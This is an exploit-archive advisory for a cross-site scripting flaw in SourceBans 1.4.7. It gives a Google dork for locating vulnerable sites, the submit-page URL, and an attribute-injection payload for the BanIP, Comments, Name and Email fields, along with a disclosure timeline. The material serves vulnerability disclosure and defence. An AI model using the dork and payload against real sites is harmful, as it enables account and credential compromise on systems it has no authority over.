39 lines
No EOL
1.1 KiB
Text
39 lines
No EOL
1.1 KiB
Text
# Exploit Title: SourceBans Version 1.4.7 XSS
|
|
# Google Dork: inurl:"sourcebans/index.php?p=submit"
|
|
# Date: Feb. 9th 2011
|
|
# Author: Sw1tCh
|
|
# Software Link: http://www.sourcebans.net/
|
|
# Version: 1.4.7
|
|
|
|
|
|
Info:
|
|
SourceBans is an application for managing publicly the banned users for a Steam Server.
|
|
|
|
#-= The Advisory =-
|
|
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
|
|
|
|
#-= Example =-
|
|
|
|
http://<SITE>/sourcebans/index.php?p=submit
|
|
|
|
- > BanIP => " onmouseover=prompt(928137) bad="
|
|
- > Comments => " onmouseover=prompt(928137) bad="
|
|
- > Name => " onmouseover=prompt(928137) bad="
|
|
- > Email => " onmouseover=prompt(928137) bad="
|
|
|
|
|
|
|
|
|
|
#Disclosure Information:
|
|
- Vulnerability found and researched: January 18th 2011
|
|
- Vendor (SourceBans) contacted: January 18th 2011
|
|
[ Time Reduced because Ops of IRC channel were dicks ]
|
|
- Disclosed to Exploit-DB, Bugtraq and InterN0T:
|
|
|
|
|
|
|
|
|
|
|
|
#Credits: Sw1tCh
|
|
|
|
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, |